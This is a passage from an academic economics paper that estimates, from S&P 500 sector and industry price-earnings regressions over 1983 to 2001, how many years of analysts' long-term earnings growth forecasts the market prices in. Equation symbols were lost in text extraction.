are not purely academic, as these growth forecasts, or the perceptions they reflect, appear to have been a key factor driving equity market valuations skyward during the latter half of the 1990s. Indeed, as shown in figure 1, the PE ratio for S&P500, the ratio of the index price to 12-month-ahead operating earnings, rose more than 50 percent between January 1994 and January 2000. Over roughly that same time period, the “bottom-up” (weighted average) long-term earnings growth forecast for the S&P500 climbed almost 4 percentage points to nearly 15 percent, well above previous peaks. Findings in Sharpe (2001) suggest this was no
To estimate the intrinsic value of the companies in the Dow Jones Industrials Index, Lee, Myers and Swaminathan (1999) use the long-term earnings growth rate as a proxy for expected growth only through year 3. They implicitly pin down earnings growth beyond that point by assuming that the rate of return on equity reverts toward the industry median over time. Gebhardt, Lee and Swaminathan (2001) also use this formulation.
1
-2coincidence, that Wall Street’s long-term growth forecasts have been a significant factor in valuations; however, because of their relatively short history and high autocorrelation, the size of that influence is difficult to gauge in aggregate analysis. (Insert Figure 1) In this study, I attempt to gauge the appropriate horizon over which to apply these growth forecasts by appealing to the market’s judgement, that is, by inferring the horizon from market prices. In particular, I propose a straightforward empirical valuation model in which linear regression can be used to deduce the forecast horizon that the “market” uses to value stocks. This model is a descendent of the Campbell and Shiller (1988, 1989) dividend-price ratio model, which is an approximation to the standard dividend-discount formula. As in Sharpe (2001), their model is modified in order to emphasize the expected dynamics of earnings rather than dividends. In the resulting framework, the horizon over which the market applies analysts’ longterm growth forecasts can be inferred from the elasticity of the PE ratio with respect to the growth forecast. I estimate the model using industry- and sector-level portfolios of S&P 500 firms, constructed from quarterly data on stock prices and consensus firm-level earnings forecasts over 1983-2001. The estimated coefficients on consensus long-term growth forecasts suggest that the market applies these forecasts to an average horizon somewhere in the range of 5 to 10 years. Thus, these growth forecasts are more important for valuation than assumed in the many applications that treat them as 3-to-5 year forecasts, though far less influential than forecasts of growth into perpetuity. Among other implications, the results suggest that the increase in S&P500 constituent growth forecasts during the second half of the 1990s can explain up to half of the concomitant rise in their PE ratios.
2. The Relation Between PE Ratios, Expected EPS Growth, and Payout Rates 2.1 The Basic Idea The principal modeling goal is to develop a simple estimable model of the relationship between the price-earnings ratio and expected earnings growth. As discussed in the subsequent section, by expanding out terms in the model of Campbell and Shiller (1988), we can produce the following relation for any equity or portfolio of equities:
-3-
(1)
where Pt is the current stock price, EPSt+1 is expected earnings per share in the year ahead, gt+j is expected growth in earnings per share in year t+j. D is a constant slightly less than 1, similar to a discount factor, and Zt is a function of the expected dividend payout rates and the required return. For the analysis that follows, divide the discounted sum of expected EPS growth rates into two pieces: (2)
where gtL represents the expected average EPS growth rate over the next T years, measured by analysts’ long-term growth forecasts, and g4 is the average growth rate expected thereafter. This amounts to assuming there is a finite horizon, T, over which investors formulate their forecasts of earnings growth; beyond that horizon, expected average growth (g4 ) is assumed constant or, at a minimum, uncorrelated with gL . We thus rewrite (1) as follows: (3)
where
and Z(T) now subsumes an additional (independent)
term containing the growth rate expected after T. Clearly, the longer the horizon over which investors’ formulate “long-term” growth forecasts, the larger will be the “effect” on stock prices of any change in that expected (average) growth rate. For instance, suppose D=0.96; if investors apply the forecast on a horizon running between year 1 through year 5 (growth in year 2, 3, 4, and 5) the multiplier on gL is 3.6. If, instead, this horizon ran from year 1 through year 10, the multiplier would be 7.4. The main contribution of this paper is to infer this horizon by estimating this multiplier--the elasticity of the PE ratio with respect to the expected growth rate-in the context of the valuation model described more thoroughly below.
-42.2 Derivation of the Empirical Model Campbell and Shiller (1988) show that the log of the dividend-price ratio of a stock can be expressed as a linear function of forecasted one-period rates of return and forecasted oneperiod dividend growth rates; that is,
(4)
where Dt is dividends per share in the period ending at time t and Pt is the price of the stock at t. On the right hand side, Et denotes investor expectations taken at time t, rt+j is the return during period t+j, and )dt+j is dividend growth in t+j, calculated as the change in the log of dividends. The D is a constant less than unity, and can be thought of as a pseudo-discount factor. Campbell-Shiller show that D is best approximated by the average value over the sample period of the ratio of the share price to the sum of the share price and the per share dividend, or Pt /(Pt + Dt). k is a constant that ensures the approximation holds exactly in the steady-state growth case. In that special case, where the expected rate of return and the dividend growth rate are constant, equation (4) collapses to the Gordon growth model: Dt /Pt = R! G. The Campbell-Shiller dynamic growth model is convenient because it faciliates the use of linear regression for testing hypotheses. As pointed out by Nelson (1999), the Campbell Shiller dividend-price ratio model can be reformulated by breaking the log dividends per share term into the sum of two terms--the log of the earnings per share and the log of the dividend payout rate. When this is done and terms are rearranged, then the Campbell-Shiller formulation can be rewritten as:
(5)
where EPSt represents earnings per share in the period ending at t, gt+j = )log EPSt+j, or earnings per share growth in t+j, and Nt+j = log(Dt+j/EPSt+j), the log of the dividend payout rate in t+j. This reformulation is particularly convenient as it facilitates a focus on earnings growth.
-5To simplify and further focus data requirements on earnings forecasts (as opposed to dividend forecasts), I assume that the expected path of the payout ratio can be characterized by a simple dynamic process. In particular, reflecting the historical tendency of payout ratios to revert back toward their target levels subsequent to significant departures, I assume that investors forecast the (log) dividend payout ratio as a stationary first-order autoregressive process: (6)
In words, the payout rate is expected to adjust toward some norm, N*, at some speed 8 < 1. It is straightforward to show that, given (6), the discounted sum of expected log payout ratios in (5) can be written as a linear function of the current payout rate: (7)
The final equation is arrived at by substituting into (5) the assumed structure of expected payout rates (7), and the assumed structure of earnings growth forecasts (2). Rearranging terms, and defining Rt as the discounted sum of expected returns:
(8)
where
is between 0 and 1.
2.3 Empirical Implementation To translate equation (8) into a regression equation with the log PE ratio as dependent variable, note that the first pair of right-hand side variables--the long-term growth forecast (gL) and the current log dividend payout rate (N)--are observable, at least by proxy. The pair of terms in brackets are the expected “long-run” log payout ratio and expected earnings growth in the “out years,” both of which are unobservable and assumed constant; thus, they are absorbed into the regression constant. Even if constant over time, they are likely to vary cross-sectionally,
-6which suggests the need for additional controls or industry dummies. Finally, expected future returns, Rt, are also unobservable. To control for time variation in expected returns, macroeconomic factors are added to the list of regressors. As discussed below, cross-sectional variation in expected returns is dealt with by including fixed effects. Letting i represent a firm or portfolio of firms, and letting Z represent proxies for, or factors in, expected returns, (8) is translated into the following regression equation: (9)
with uit a mean-zero error term, assumed to be uncorrelated with the explanatory variables. Given an assumed value for D, the horizon over which investors apply analysts’ longterm growth forecasts can be inferred from the magnitude of $, which should be positive. For these calculations I assume D=0.96; in that case, if long-term growth horizon applied to the five years of growth beginning at the end of the current year ( T=6), we would expect the coefficient on long-term growth to be 4.4 . The resultant mapping from horizon T to implied coefficient is provided in the following table:
T $ 2 0.96 3 1.9 4 2.8 5 3.6 6 4.4 8 6.0 10 7.4 20 12.9
4
24
To understand why the best approximation for D is
, consider the case where g is
the expected growth into perpetuity (T=4). In this case, the coefficient on g, according to (8), would boil down to simply D/(1!D) = P/D. But this is precisely the implied effect of growth on price in the Gordon (constant) growth model; in that model, inferred horizon is not very sensitive to the precise choice of D.2 According to the model (8), the coefficient on the dividend payout rate should lie between 0 and 1. It would equal 1 if the current payout rate was expected to be maintained . Moreover, as long as the horizon is not extremely distant -- the coefficient on gL is not too large -- then the
2
For instance, if T=6, then the coefficient ($ ) is predicted to be 4.3 for D=0.95 versus 4.6 for
D=0.97.
-7forever (8=0); in most cases it should be much closer to zero than 1, even if the dividend payout rate is expected to revert quite slowly back to the long-run payout rate. For instance, if 8=0.1 (the payout rate is adjusted annually by 10 percent of the gap between the desired and current level), then the theoretical coefficient on the payout rate (given D=.96) would be 0.27. Clearly, the assumed dynamics of the payout rate are a simplification. It is quite plausible, for instance, that the long-run target for any given industry evolves over time. If that were the case, then we would expect the current payout rate to carry more information about the average future payout; thus, its coefficient would be larger than that what is implied by short-run autocorrelations, and we would interpret it somewhat differently. However, this would not alter our interpretation of the coefficient on the growth forecast. Indeed, excluding the payout rate from the regression or adding another lag does not substantially alter inferences drawn with regard to the growth horizon. As in much of the research on expected returns, estimation is conducted on portfolios of firms. One potential benefit of this aggregation is a reduction in potential measurement error that comes from using analysts’ forecasts as proxies for long-term growth forecasts. But using portfolios is also necessary because model (8) cannot be applied literally to firms that do not have positive dividends and earnings because the log payout ratio would be undefined. The model is too stylized for application to very immature firms. To some extent, this observation guides the choice of portfolio groupings. In particular, firms are grouped into portfolios by industry, rather than by characteristics that would be correlated with firm size or maturity.
3. Data and Sample Description 3.1 The data The sample is constructed using monthly survey data on equity analyst earnings forecasts and historical annual operating earnings, both obtained from I/B/E/S International. A dataset of quarterly stock prices and earnings forecasts is constructed using the observations from the middle month of each quarter (February, May, August, and November), beginning in 1983, when long-term growth forecasts first become widely available in the I/B/E/S database. The sample in each quarter is built using firms belonging to the S&P500 at the time. Sample firms must also have consensus forecasts for earnings per share in the current fiscal year (EPS1) and the
-8following fiscal year (EPS2), as well as a consensus long-term growth forecast. Data on dividends per share are mostly drawn from the historical I/B/E/S tape, though missing values in the early part of the sample are filled in using Compustat. The data of greatest interest in this study are the equity analysts’ long-term growth forecasts, which I measure using the median analyst forecast from I/B/E/S, where the typical forecast represents the “expected annual increase in operating earnings over the company’s next full business cycle.” In general, these forecasts refer to a period of between three to five years (I/B/E/S International, 1999). Clearly, this description is fairly ambiguous about the horizon of these forecasts, though three to five years is probably the most widely cited horizon. The measure of expected earnings used for the denominator of the PE ratio is constructed using forecasts for both current-year and next-year earnings. For any given observation, a firm’s “12-month-ahead” earnings per share EPSt = wm*EPS1 + (1-wm)*EPS2, where the weight (wm) on current year EPS is proportional to the fraction of the current year that remains. For instance, wm is 1 if the firm just reported its previous fiscal-year earnings within the past month, and it equals 11/12 if the firm reported its previous year’s earnings one month ago. The PE ratio is then calculated as the ratio of current price to 12-month-ahead earnings. To construct the lagged dividend payout ratio, I create an analogous measure of 12month lagging earnings. Specifically; 12-month lagging earnings, or EPSt-1 = wm*EPS0 + (1wm)*EPS1, where EPS0 is earnings per share reported for the previous fiscal year. The dividend payout rate is then calculated as the ratio of the firm’s most recent (annualized) dividend per share to its 12-month lagging operating earnings per share. Prior to 1985, the dividend variable is not provided in the I/B/E/S data. For these observations, the dividend per share value is taken from Compustat.
3.2 Construction of Sector and Industry Portfolios For each quarterly observation, firms are grouped into portfolios using two alternative levels of aggregation. In the more aggregated case, firms are grouped into 11 sectors, which are broad economic groupings as defined by I/B/E/S (Consumer Services, Technology, ...etc.). The second portfolio grouping is comprised of industry-level portfolios, constructed using I/B/E/S industry codes that are similar in detail to the old 2-digit Standard Industrial Classification (SIC)
-9industry groupings. For instance, the technology sector is broken down into (i) computer manufacturers, (ii) semiconductors and components, (iii) software and EDP services, and (iv) office and communication equipment. Each quarterly observation for each variable is constructed by aggregating over all portfolio members in that quarter--S&P500 firms in the given sector (or industry). Constructing a portfolio aggregate long-term growth forecast is somewhat tricky because these variables are growth rates and because there is no clearly optimal set of weights for aggregating these growth rates. The most intuitive choice would be the level of a firm’s previous-year earnings; but this would be nonsensical in the case where some firms had negative earnings. To get around this, I use a measure of expected earnings; in particular, each firm’s weight is calculated as current shares times the maximum of [EPS1, EPS2, 0]. Because EPS2 is almost always positive for S&P500 firms, this approach avoids the problem of potentially negative weights and minimizes the number of companies that get zero weight. The dependent variable, the price-earnings ratio, is constructed by summing up the market values of all (S&P500) sector or industry members, and then dividing by the sum of their expected 12-month ahead earnings. Similarly, dividend payout rates at the portfolio level are constructed by summing the dividends (dividends per share times shares outstanding) of portfolio members and dividing by the sum of their 12-month lagging earnings. The payout rate and the PE ratio are undefined when their denominators are negative; thus, these variables are occasionally undefined when we use the finer industry-level portfolio partition. Moreover, there is a higher frequency of negative observations on 12-month lagging earnings than on 12-month ahead earnings (presumably owing to analysts’ optimistic bias); that is, actual earnings are negative more often than expected earnings. To reduce the loss of industry-level observations as a result of negative earnings, in constructing industry payout ratios, I substituted an industry’s 12-month ahead earnings for its 12-month lagging earnings in cases where the latter is negative and the former is not, with little effect on the results.
3.3 Controls for expected returns Because empirical inferences are partly drawn from the time series dimension of the data, I include a couple proxies for the expected long-run return on the market portfolio, specifically
-10the long-term (10-year) government bond yield and the risk spread on corporate bonds, equal to the difference between the yields on the Moody’s Aaa and Baa corporate bond indexes. In light of the findings by Fama and French (1989) and others, that excess expected equity returns are positively related to the risk spreads on bonds, we expect the PE ratio to be negatively related to both the corporate risk spread and the bond yield. A third macro factor I consider is the expected inflation rate, as proxied by the fourquarter expected inflation rate from the Philadelphia Federal Reserve survey of professional forecasters. As suggested in Sharpe (2001), expected inflation also appears to be a positive factor in required equity returns (before taxes), perhaps because inflation raises the effective tax rate on real equity returns. I do not construct a measure of the industry or sector portfolio betas, or any other crosssectional determinants of expected returns. First, the bulk of empirical research weighs in on the side of finding very little role for beta. Perhaps most salient study in this regard is Gebhardt, Lee, and Swaminathan (2001), which also analyzes expected returns with an earnings-based ex ante measure. They find beta to be of little value in explaining cross-sectional differences in expected return. On the other hand, their findings suggest that industry membership is a factor in expected returns; I control for potential industry factors in expected returns by including fixed industry effects.3
3.4 Sample Statistics After dropping the first observation per sector or industry in order to create one lag on the PE ratio, the sample runs from 1983:Q2 to 2001:Q2. This leaves a potential of 73 quarterly
Indeed, Gebhardt, et. al find the long-term growth forecast to be a positive factor in firm-level expected returns. But that finding might be the result of assumptions they use to construct their ex ante measure of expected return. If their measure builds in too long a horizon on the growth forecast, then the growth forecast will appear to have a positive effect on expected return (or a negative effect on valuations). In their “terminal value” calculation, the slow decay rate of ROE, and the use of median industry ROE as the expected ROE for perpetuity, may implicitly build in too long a horizon on current expected earnings growth or, more precisely, on the value of ROE in year t+4. Indeed, it is somewhat curious that long-term growth is a significant factor in expected return only when the regression also includes the book-to-market ratio–another key component in the construction of the dependent variable.
3
-11observations for each of 11 sectors, or 803 sector-time observations. In addition to excluding observations for which earnings are negative or dividends are zero, those with extreme values are also filtered out. In particular, observations are excluded if either the portfolio PE ratio exceeds 300 or its dividend payout rate exceeds 5.0. In the case of sector portfolios, these filters remove only 2 observations; and no observations are lost as a result of negative earnings or zero dividends. Distributions of the key variables for the sector portfolios are depicted by the top number among each pair of numbers in table 1. The average sector price-earnings ratio over the sample period is about 14, and it ranges from 3.5 to 54.1. The average dividend payout rate is 0.45 (or 45 percent of earnings), with a range of 0.08 to 2.16. The average expected long-term growth rate is 11 percent, with a range of 5 to 20 percent. Correlations among variables are shown in the bottom half of the table. The PE ratio is strongly correlated with the earnings growth forecast, as theory would suggest, but it is uncorrelated with the dividend payout rate. The earnings growth forecast is negatively correlated with the dividend payout rate, consistent with the prediction that firms with lower growth prospects pay out a higher proportion of their dividends. In the case of industry portfolios, roughly 120 observations are excluded where industry dividends are zero or, in a handful of cases, where expected year-ahead earnings are negative, leaving 4071 observations on 66 industries.4 Another 14 observations are excluded because the PE ratio exceeds 300 or the dividend payout rate exceeds 5, leaving 4057 industry-quarter observations, an average of about 62 quarters per industry. Distributions and correlations for the industry portfolio variables are depicted by the bottom figures among the pairs in table 1.
4. Empirical Results 4.1 Sector Regressions Table 2 shows the results of sector portfolio regressions with the log of the PE ratio as dependent variable. Heteroskedasticity and autocorrelation-consistent (Newey-West) standard
I have also excluded 5 very small industries for which the average total industry market value (over the sample period) is less than $1 billion. Also note that not all industries ex ist over the entire sample.
4
-12errors are reported below the coefficient estimates. Column (1) shows the simplest specification; it includes the earnings growth forecast, the sector payout rate, the yield on the 10-year Treasury bond, and the risk spread on corporate bonds. The coefficient estimate on the growth forecast is 8.05, with a standard error of 0.5, indicating relatively high precision. The magnitude of the coefficient suggests that growth forecasts reflect expectations over a fairly long horizon. In particular, given that equals 7.75 for T=10 and 8.5 for T=11, the inference would be
that the long-term growth forecast represents the expected growth rate for a 9 or 10 year period, starting from the coming year’s expected level of earnings. The coefficient on the payout rate, 0.34, falls within the [0,1] range dictated by theory; but, interpreted literally, the magnitude of the coefficient implies that payout rates adjust very slowly toward their long-run desired levels. Interpreted more loosely, one could infer that the current payout rate conveys some information about a sector’s long-run desired payout rate, which is not likely to be constant over the very long run as assumed by the model. The coefficients on the bond yield and the risk spread are both negative, as theory and previous empirical results would predict. The coefficient on the Treasury bond yield implies that a one percentage point increase in long-term yields drives down the PE ratio by about 12 percent -- or, holding E constant, drives down the stock price 12 percent. The regression R-squared is quite high, suggesting these four variables explain about 70 percent of the overall cross-sectional and time series variation in price-earnings ratios. The root mean squared error is 0.2. One problem with this specification, however, is the presence of strong autocorrelation in the errors, reflected in a Durbin-Watson statistic of 0.32. In specification (2), this is rectified by modeling the dynamics with the addition of a lagged dependent variable, the lagged PE ratio, which receives a coefficient of 0.75. Not surprisingly, adding this regressor boosts the Rsquared substantially, to 0.910, and cuts the root mean squared error in half. The Durbin-h test now strongly rejects the presence of autocorrelation. Interpreting the coefficient on the growth forecast is a bit more complicated here because that coefficient, equal to 2.00, now represents only the “impact effect”. The total long-run effect of a change in the growth forecast is equal to the impact coefficient divided by one minus the coefficient on the lagged PE, or 2/(1!0.75) = 8. Thus, the conclusion from the original regression holds up: the growth forecast still appears to represent a horizon of about 9 years.
-13The long-run effect of the payout rate is 0.28, only a bit smaller than the static estimate. One notable difference from the static model is that the sign on the risk spread flips to positive, although that variable is no longer statistically significant. Thus, once we account for growth expectations and the underlying dynamics, the risk spread no longer has marginal explanatory power for stock valuations. The third and fourth specifications address the potential omitted variable problem. Gebhardt, et. al (2001) find sector-level factors in expected returns. If sector-level (but nongrowth-related) factors are correlated with sector long-term growth expectations, then the coefficient on growth forecasts will be biased. Sector-level expected-return factors can be removed using a fixed effects estimator. In column (3), results are shown for the static version of the model estimated on sector-mean-adjusted variables; and, in (4), results are shown when fixed effects are similarly incorporated into the dynamic model. In both cases, the results continue to yield conclusions similar to the first specification.5 Finally, I consider the possibility that omitted macroeconomic factors in expected returns are correlated with changes in the average sector growth forecast over time. Column (5) shows the results from adding expected inflation, specifically, expected inflation over the next four quarters as measured by the Philadelphia Fed survey of professional forecasters. As shown by Sharpe (2001), expected inflation seems to be related to both expected earnings growth and expected returns. In addition, controlling for expected inflation allows us to interpret the estimated effect of changes in expected long-term growth as reflecting changes in real growth expectations. In any case, adding expected inflation to the dynamic specification reduces somewhat the estimated effect of expected growth. Here, the long-run effect of 6.63 is consistent with a horizon between 7 and 8 years. The final specification takes a more agnostic approach to macro factors and adds year dummies (in addition to the fixed sector effects). This eliminates any effect of the growth forecast that might be purely time-driven, and thus provides the most conservative estimate of the effect of these earnings expectations. Indeed, the long-run coefficient on the growth forecast falls to 5.45 in this regression, which suggests a horizon of about 6 years. Considering the
Given the sample size, the small sample bias that arises w hen a lagged dependent variable is used in conjunction with fixed effects should not be an issue.
5
-14totality of the findings in table 2, one would conclude that the horizon of the earnings growth forecast falls somewhere in the range of 6 to 10 years.
4.2 Industry Regressions An analogous set of results based on narrower industry-level portfolios is shown in table 3. The industry-level results generally follow the pattern of the sector-portfolio results, with one important difference. In these regressions, the long-run coefficient on the growth forecast tends to be about two-thirds the magnitude found in the analogous sector-level regressions. In particular, the coefficient estimate on the growth forecast runs from 5.4 in the specifications without fixed effects down to 3.9 in the specification with both fixed industry and time effects. These results would suggest that investors apply the growth forecast to a somewhat shorter horizon – between 5 and 7 years, compared to the 6 to 10-year range suggested by the sectorlevel analysis. One potential explanation of the difference between the sector- and industry-level coefficient estimates revolves around the idea that the analyst growth forecasts measure investor expectations with error. Assuming minimal measurement error on other regressors, then measurement error in the growth forecast would produce a downward bias in the coefficient on expected growth. Furthermore, if measurement errors were not highly correlated across firms or industries within a given sector, then using a higher level of aggregation would tend to reduce this measurement error. A similar but more structural explanation for the difference in results could be that investor expectations of a firm’s or industry’s growth beyond the very near term is partly reflected in growth expectations for other firms or industries within the same sector. Under either interpretation, we would expect sector growth forecasts to help explain variation in industry PE ratios, even after controlling for the industry growth forecast. This hypothesis can be examined by reestimating the industry regressions but with the sector growth forecast as an additional explanatory variable. With both the industry and sector growth forecasts in the regression, the sum of their two coefficients can be interpreted as measuring the total effect of an increase in forecasted industry growth that is matched by an equal-sized increase in the forecast for sector-level growth. The key results from re-estimating specification (1) are provided in the first column of
-15Table 4. As shown, the coefficients on the industry and sector growth forecasts are 4.35 and 1.87, respectively. These two coefficients sum up to 6.22, which is larger than the original industry growth effect from the analogous industry-level regression (table 3) though still smaller than the coefficient in the sector-level regression (table 2). Results from rerunning specification (4) are shown in the second column. The estimated (long-run) coefficients on industry and sector growth forecasts are 3.62 and 3.41, respectively. Thus, it again appears that sector growth expectations help explain industry valuations. Here, the coefficients sum to a total effect of 7.03, which is closer to the long-run coefficient on growth in the sector regression (7.92) than to that in the industry regression (4.53).6
4.3 Robustness over time As a final robustness test of the model and its application to the analyst forecast data, I split the data into early (1983-1991) and late (1992-2001) subsamples and reestimate some of the key industry- and sector-level regressions. This experiment provides evidence on the extent to which our inferences depend upon the time period under consideration. Table 5 compares the coefficients estimates on the long-term growth forecast for the two time periods, under four alternative specifications (regressions (1) and (4) for both the sector and industry portfolios). Although not shown in the table, the coefficient on the dividend payout rate is always positive and less than 0.5, while the coefficient on the Treasury bond yield is always negative. In short, the results do indicate that there is a substantial difference between the early and late sample valuation effects of long-term growth forecasts. Although statistically positive in all cases, the coefficient on the growth forecast is about double in the later subsample compared to the analogous early-sample estimate. For instance, in the simple sector regression (1), the earlysample coefficient on growth is 6.1, whereas the late sample coefficient in 10.0. This suggests that the horizon in the early sample is about 7 years, whereas it is closer to 12 years in the more recent period. At the other end of the spectrum, the dynamic fixed-effect regression (4) on
An alternative tack, which amounts to the same test, would be to put the industry growth forecast and, second, the differential between the sector and industry growth forecasts in the regression . In this case, the coefficient on the industry growth forecast would be 7.02, and the coefficient on the differential would be 3.4.
6
-16industry portfolios produces a long-run coefficient of 2.3 in the early period, suggesting a 2 to 3 year horizon, versus 4.5 in the late period, consistent with a 5-year horizon.7 We are thus led to the inference that long-term growth forecasts carried more weight, or were applied to a longer horizon, during the past decade. This could owe either to the fact that analyst forecasts have become more widely applied in valuation analysis or to an increased emphasis placed on these long-term growth forecasts by analysts and their customers.
4.4 Caveats Before concluding, some cautionary remarks are in order. It should be emphasized that the interpretation0 of the results is conditioned upon the maintained hypothesis that the assumptions behind the model are a reasonably approximation of reality. While this is true of any econometric application, it is important here because the conclusions revolve around the magnitude of the key coefficients, rather than just their sign and statistical significance. Clearly, there are a number of rationales one could invoke for why that model might be prone to either overestimate or underestimate the forecast horizons imputed to investors. On one hand, the analysis ignores the potential influence of momentum, or positivefeedback, trading, which would cause stock prices to overreact to fundamentals. In other words, if stock prices in an industry rise due to an increase in the growth outlook over the next few years, momentum trading could amplify the ultimate stock price effect. In that case, the model would overstate the duration that investors actually attribute to growth forecasts. On the other and, it is possible that the required return on a firm or industry’s stock is positively related to its expected growth rate, since high growth firms or industries may be riskier. This would imply the presence of a second (negative) channel through which growth expectations might influence PE ratios, making identification problematic. If we fail to control for a any such negative effect on stock prices coming through a required-return channel, the model would underestimate the imputed horizon of these forecasts, by underestimating their positive influence owing to their role as proxies of expected growth.
While the “discount” or weighting factor [D = P/(P+D)] used in the m odel approximation shou ld be somewhat smaller in the early period, due to the higher average dividend yield in the 1980s, the difference would not be nearly enough to justify the difference in coefficient estimates.
7
-17-
5. Summary and Implications The empirical analysis strongly confirms the value-relevance of analysts’ long-term earnings growth forecasts. In particular, most regression coefficient estimates suggest that a 1 percentage point increase in expected earnings growth can explain a 4 to 8 percent boost in an industry’s PE ratio. According to the model, these regression coefficients imply that the market treats these forecasts as having an applicable horizon of at least 5 years, and perhaps as many as 10 years. Results from splitting the sample indicates that long-term growth forecasts had larger valuation effects during the past decade than they did in the previous decade, which suggests that the upper-end estimates (the 10-year horizon) may be more relevant for the more recent period. In light of the 4 percentage point increase in the “bottom-up” growth forecast for the S&P500 during the latter half of the 1990s (documented in figure 1), these findings suggest that the increrase in long-term growth expectations might account for as much as a 32 % (8 x 4%) rise in the market PE ratio over those years, about half of the total increase. The empirical relation between equity valuations and long-term growth forecasts suggests that investors view such forecasts as strong indicators of growth prospects for several years. It would thus appear that the market places a great deal of faith in the ability of analysts to divine differences in firm or industry long- term prospects; but, this begs the question: How good are such longer-term growth predictions? A detailed analysis of this issue is beyond the scope of my study; however, some recent research suggests that investors could well be misguided in putting so much weight on these forecasts. One finding is that long-term forecasts are not only upward biased, like forecasts on more specific, shorter-term horizons, but they also appear to be “extreme”; that is to say, the higher a growth forecast is, the more upward biased it tends to be [Dechow and Sloan (1997), Rajan and Servaes (1997)]. In addition, there is mixed support for the view that analysts over-extrapolate from recent observations [De Bondt (1992), La Porta (1996)]. If the weight placed on these forecasts overreaches the ability of analysts (and perhaps anyone else) to predict long-run performance, the forecasts should be contrary indicators of future stock performance. Indeed, these studies find that stock returns for firms with high longterm growth forecasts tend to be substandard. In an analysis of long-term growth forecasts
-18issued from 1982-1984, De Bondt (1992) finds a significant inverse relation between expected growth and excess returns over the subsequent 12-18 months. La Porta’s (1996) analysis of forecasts issued from 1982-1991 finds subsequent stock returns to be negatively related to beginning-of-period long-term growth forecasts; and both Rajan and Servaes (1997) and Dechow, Hutton and Sloan (1999) find that post-offering performance of IPO stocks is worse for firms with higher long-term growth forecasts. Finally, Chan, Karceski and Lakonishok (2003) offer some very interesting evidence on the efficacy of long-term growth forecasts. In particular, they compare realized growth to forecasted growth for firms sorted annually into quintile portfolios based on their I/B/E/S longterm growth forecasts. On average over their sixteen year sample, the median growth rate forecast in the top quintile is 22.4 percent, compared to a median of 6 percent in the bottom quintile, a spread of 16-1/2 percentage points. They compare this spread with the spread between the median growth rates actually experienced in subsequent years. Their calculations imply that, from year 2 through 5, the median realized growth rates in the top and bottom quintiles differed by 5-1/2 percentage points, only a third of the average forecasted differential.8 On average, my coefficient estimates suggest that industry portfolios are valued as if the market believes that the differential in long-term growth forecasts should be applied to a six- to seven-year horizon. Of course, there are alternative interpretations of my regression estimates. One possibility is that investors (correctly) expect only a third of the differential between growth forecasts to be realized, but that they apply that smaller differential over a much longer horizon. To rationalize this interpretation, though, investors would need to expect the reduced differential to persist for over 20 years. Such beliefs would appear to fly in the face of another finding by Chan, et al. (2001), that there is remarkably little long-term persistence in firm-level income growth. All this would seem to indicate that, even if using the long horizons suggested by my estimates produces more accurate measures of investors’ expected returns, using such horizons would seem to be an ill-advised strategy for making portfolio investment decisions.
8
They find that, in the first year after the forecast, median realized growth in operating income for those quintiles was 16 percent and 3-1/2 percent, a spread of 12-1/2 percentage points, about three-fourths of the expected spread. But the spread in median realized growth narrows to 7 points when the performance period is extended to 5 years. Backing out the strong contribution from the first year yields an implied average growth differential in the subsequent four years (years 2-5) of about 5-1/2 percent.
-19Like the evidence on stock returns and growth forecasts discussed earlier, the analysis by Chan, et al. (2001) is largely focused on the cross-sectional informativeness of growth forecasts. To complete the picture, an important direction for future research would involve focusing on the efficacy of the time-series information in long-term growth forecasts, measured by changes in such forecasts for a given firm or industry.
-20References
Campbell, John Y. and R. Shiller. 1988. “Stock prices, Earnings, and Expected Dividends.” Journal of Finance 43 (July): 661-671. Campbell, John Y. and R. Shiller. 1989. “The Dividend-Price Ratio and Expectations of Future Dividends and Discount Factors.” Review of Financial Studies. 1: 195-228. Chan, Louis K.C., Jason Karceski, and Josef Lakonishok. 2003. “The Level and Persistence of Growth Rates.” The Journal of Finance 58 (April): pp.643-684. Claus, James and Jacob Thomas. 2001. “Equity Premium as Low as Three Percent? Empirical Evidence from Analysts’ Earnings Forecasts for Domestic and International Stock markets.” Journal of Finance 56 (October): 1629-1665. De Bondt, Werner F.M. 1992. Earnings Forecasts and Share Price Reversals. Charlottesville, Virginia: The Research Foundation of the Institute of Chartered Financial Analysts (Monograph). Dechow, Patricia M., Amy P. Hutton, and Richard G. Sloan. 2000. “The Relation between Analysts’ Forecasts of Long-term Earnings Growth and Stock Price Performance Following Equity Offerings.” Contemporary Accounting Research 17 (Spring). Gebhardt, William R., Charles M.C. Lee, and Bhaskaran Swaminathan. 2001 “Toward an Implicit Cost of Capital.” Journal of Accounting Research 39 (June): 135-177. Harris, Robert S. and Felicia C. Marston. 1992. “Estimating Shareholder Risk Premia Using Analysts’ Growth Forecasts.” Financial Management 21 (Summer): 63-70. Harris, Robert S. and Felicia C. Marston. 2001. “The Market Risk Premium: Expectational Estimates Using Analysts’ Forecasts.” Mimeo. Khorana, Ajay, R. Charles Moyer, and Ajay Patel. 1999. “The Ex ante Risk Premium: More Pieces of the Puzzle.” Georgia Institute of Technology (working paper). La Porta, R.. 1996. “Expectations and the Cross-section of Returns.” Journal of Finance 51 (December): 1715-1742. Lee, Charles M.C., James Myers, and Bhaskaran Swaminathan. 1999. “What is the Intrinsic Value of the Dow?” The Journal of Finance 54 (October): 1693-1741. Nelson, William R.. “The Aggregate Change in Shares and the Level of Stock Prices.” Finance and Economic Discussion Series no. 1999-08. Federal Reserve Board (1999).
-21Rajan, R., and H. Servaes. 1997. “Analyst Following of Initial Public Offerings.” Journal of Finance 52 (June): 507-529. Sharpe, Steven A., 2002. “Reexamining stock valuation and inflation: The implications of analysts’ earnings forecasts.” Review of Economics and Statistics 84 (November): 632649.
-22Table 1 Sample Statistics for Sector Portfolios (top) and Industry Portfolios (bottom) ___________________________________________________________________ Mean P/E 14.2 14.9 0.45 0.41 Growth 0.28 Std. Dev 5.8 7.5 0.20 0.01 Min 3.5 3.0 0.08 4.1 Max 54.1 127.3 2.2
Payout
11.2 0.03 0.05 0.20 14.9 0.03 0.03 0.27 ___________________________________________________________________
Pearson Correlation Coefficients ______________________________ P/E Payout 0.15 Growth 0.02 1.00 Payout 1.00
0.45 -0.44 0.30 -0.33 _______________________________ The samples runs quarterly from 1983:Q2 to 2001:Q2. In the more aggregated portfolios, there are 801 observations on 11 sectors; the second sample has 4071 observations on 66 industries.
-23Table 2 Sector Portfolio Regressions: Dependent variable is the sector-level log PE ratio*
(1) Growth ($) $/(1-8) 8.05 (0.50) (2) 2.00 (0.55) 8.00 (3) 9.69 (1.05) (4) 2.66 (0.77) 7.92 (5) 2.30 (0.70) 6.63 (6) 1.69 (0.70) 5.45
